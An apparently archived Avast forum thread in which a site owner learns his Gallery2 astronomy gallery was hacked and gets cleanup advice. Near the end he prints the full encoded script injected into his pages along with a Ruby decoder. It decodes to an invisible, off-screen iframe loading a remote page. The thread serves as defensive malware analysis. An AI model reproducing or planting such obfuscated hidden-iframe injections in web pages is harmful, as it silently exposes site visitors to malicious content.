Avast says my Gallery2 website is infected with a Trojan, please help!

[SanderP]

Hi,

I have several web sites, one of them a gallery with my astronomical images. Yesterday I posted a new picture I took a few days ago and someone warned me that Avast says my site is infected with a Trojan. Then someone else reported the same, also with Avast. I use two different (nameless virus scanners on my PCs and they don't see a problem. Clearly I want to exterminate any infections in my site but I also don't want false positives to keep people away. Could someone from Avast please have a look? I googled the subject and searched this site but didn't see it reported before.

This is the link: http://gallery.tungstentech.com/main.php?g2_itemId=1406

Thanks!

[Lisandro]

Generally, avast detection is accurate in these cases.
Isn't it an encrypted/obfuscated script or iframe?
Wasn't the site hacked?

I'll take a look into its code...

[Lisandro]

Yeah, the site was hacked...
In the end of the page, there is an encrypted script...

</body>
</html><script type="text/javascript">var eMCeGjolMPJFNuucZWLk = ... ... continues.

[SanderP]

Wow, that's terrible. Thanks! I'll fix it asap and have taken my site offline for now.

[DavidR]

You also need to address why you got hacked and close the vulnerability or 'I'll be back.'

- This is commonly down to old content management software being vulnerable, see this example of a HOSTs response to a hacked site.

We have patched up the server and we found a weakness in PHP which was helping aid the compromise of some domains.  We updated it, and changed some default settings to help prevent these coding compromises. The weaknesses were not server wide but rather just made it easier on a hacker to compromise individual end user accounts.

I suggest the following clean up procedure for both your accounts:

1. check all index pages for any signs of java script injected into their coding. On windows servers check any "default.aspx" or
"default.cfm" pages as those are popular targets too.

2. Remove any "rouge" files or php scripts uploaded by the hackers into your account. Such scripts allowed them to make account wide
changes, spam through your account, or spread their own .htaccess files through all of your domains in that end user.

3. Check all .htaccess files, as hackers like to load re-directs into them.

4. Change all passwords for that end user account. The cp password, the ftp password, and any ftp sub accounts. Make sure to use a
"strong" password which includes upper case, lower case, numbers and NO COMPLETE WORDS OR NAMES!

This coupled with our server side changes should prevent any resurfacing of the hackers efforts. In some cases you may still have coding which allows for injection. All user input fields hidden or not should be hard coded, filtered, and sanitized before being handed off to php or a database which will prevent coding characters from being submitted and run through your software.

Also see, Tips for Cleaning & Securing Your Website, http://www.stopbadware.org/home/security.

Also see forum topic, http://forum.avast.com/index.php?topic=45458.0.

[SanderP]

Yes, naturally.

[polonus]

Hi SanderP,

I get this error code:

Code: [Select]

HEAVILY EDITED BY ME!^h2 Configuration Error: Missing Theme ^/h2^
^/div^
^div class="gbBl*ck"...^
^h3> Missing Theme .../h3^
 ^p class="giDescripti*n"^
This album is configured to use the ^b>carbon</b^
 theme, but it is either inactive, not installed, or incompatible.
To fix this problem you can either ^...a href="main.php?g2_view=core.UserAdmin&g2_subView=c*re.UserLogin&g2_return=%2Fmain.php%3Fg2_view%3Dcore.ShowItemError%26g2_problem%3DmissingTheme%26g2_itemId%3D1406%26"...^
login^/a> and then <a href="main.php?g2_view=core.ItemAdmin&g2_subView=c*re.ItemEdit&g2_editPlugin=ItemEditAlbum&g2_itemId=1405&g2_return=%2Fmain.php%3Fg2_view%3Dcore.ShowItemError%26g2_problem%3DmissingTheme%26g2_itemId%3D1406%26"^.................
choose a new theme for this album^/a> or <a href="main.php?g2_view=c*re.UserAdmin&g2_subView=c*re.UserLogin&...........
g2_return=%2Fmain.php%3Fg2_view%3Dcore.ShowItemError%26g2_pr*blem%3DmissingTheme%26g2_itemId%3D1406%26"^
login as a site administrat*r</a> and then <a href="main.php?g2_view=c*re.SiteAdmin&g2_subView=core.AdminPlugins&g2_mode=c*nfig&...............g2_return=%2Fmain.php%3Fg2_view%3Dcore.Sh*wItemError%26g2_problem%3DmissingTheme%26g2_itemId%3D1406%26"^
install or activate this theme^/a^
You are familiar with this, probably the loading of the redirect?

polonus

[SanderP]

Hi,

I don't see that error right now. I just installed the latest Gallery2 code and was able to upgrade the database. Things look good and I verified that the javascript is no longer being emitted. I'll be taking further precautions, naturally. Do you still see it?

Thanks,

  Sander

[polonus]

Hi SanderP,

I checked again using the bad stuff detektor, and the failcode I could not detect this time.
This what you have to check now:
Results from 22.10 Dutch local time - European Central Time -
No zeroiframes detected!
Check took 10.05 seconds

(Level: 0) Url checked:
hxtp://gallery.tungstentech.com/main.php?g2_itemId=1406
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://gallery.tungstentech.com/main.php?g2_view=core.combinedjavascript&g2_key=5d713f3ae3d3f2c55383cb50739371e9
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://gallery.tungstentech.com/themes/carbon/theme.js
Zeroiframes detected on this site: 0
No ad codes identified

Please adopt the links you gave in your postings to make them non.click-able for the curious of nature, like I did above using either htXp:// or wXw

polonus

[SanderP]

I will do that, good idea.

[CharleyO]

***

Here is something else to consider :

I use two different (nameless  virus scanners on my PCs and they don't see a problem.

This may be why your computer does not detect this problem.


***

[polonus]

Hi CharleyO,

This could be true, if there are two resident virus scanners there they will interfere with each other and alert each others signatures. A resident scanner like avast combined with a non-resident scanner like DrWebCureIt or Standalone AV-scanner like McAfee's stinger.exe etc. pose no problems,

So the mistake made here is that more of the same is better, same mistake can be made with software firewalls. It is like two dogs guarding a house, and in stead of guarding the house, they start to fight among each other while the malcreant can sneak in,

polonus

[SanderP]

Eh, yeah. I'm not that much of a noob you know I meant two different PCs, two different virus scanners. My company uses Symantec corporate and I use something else.

[polonus]

Hi SanderP,

No offense meant, you will be OK, as soon as you are being made familiar where you have to look on the site for the malcode infection. This for check ups can help: http://www.blacklistdoctor.com/bld/diagnose.php
There aren't a lot of av vendors that have set out to their users that there is a big difference between general (OS and software independent) malcode and OS and software specific malware, they often are presented and swept together for obvious reasons. But to better analyze malcode all sorts we should consider and determine under what category it comes, also to better evaluate the vector payload. Thanks again for reporting, and providing the malware fighter's challenge,

polonus

[SanderP]

I converted the jscript to ruby to see what it does. The iframe gets the source from you - found - it . org (no spaces) which thankfully is suspended according to whois. I tried to get the page with wget and it timed out. So luckily the infection has been harmless for at least a while.

Here is the ruby equivalent of the code. Naturally the puts was a document . write to add the iframe:

Code: [Select]

enc_str = "jc60jc105jc102jc114jc97jc109jc101jc32jc119jc105jc100jc116jc104jc61jc34jc52jc56jc48jc34jc32jc104jc101jc105jc103jc104jc116jc61jc34jc54jc48jc34jc32jc115jc114jc99jc61jc34jc104jc116jc116jc112jc58jc47jc47jc121jc111jc117jc45jc102jc111jc117jc110jc100jc45jc105jc116jc46jc111jc114jc103jc47jc105jc110jc100jc101jc120jc46jc112jc104jc112jc34jc32jc115jc116jc121jc108jc101jc61jc34jc98jc111jc114jc100jc101jc114jc58jc48jc112jc120jc59jc32jc112jc111jc115jc105jc116jc105jc111jc110jc58jc114jc101jc108jc97jc116jc105jc118jc101jc59jc32jc116jc111jc112jc58jc48jc112jc120jc59jc32jc108jc101jc102jc116jc58jc45jc53jc48jc48jc112jc120jc59jc32jc111jc112jc97jc99jc105jc116jc121jc58jc48jc59jc32jc102jc105jc108jc116jc101jc114jc58jc112jc114jc111jc103jc105jc100jc58jc68jc88jc73jc109jc97jc103jc101jc84jc114jc97jc110jc115jc102jc111jc114jc109jc46jc77jc105jc99jc114jc111jc115jc111jc102jc116jc46jc65jc108jc112jc104jc97jc40jc111jc112jc97jc99jc105jc116jc121jc61jc48jc41jc59jc32jc45jc109jc111jc122jc45jc111jc112jc97jc99jc105jc116jc121jc58jc48jc34jc62jc60jc47jc105jc102jc114jc97jc109jc101jc62"

split_enc_str = enc_str.split("jc")
out_str = ""
split_enc_str.each do |num|
out_str+=num.to_i.chr
end

puts out_str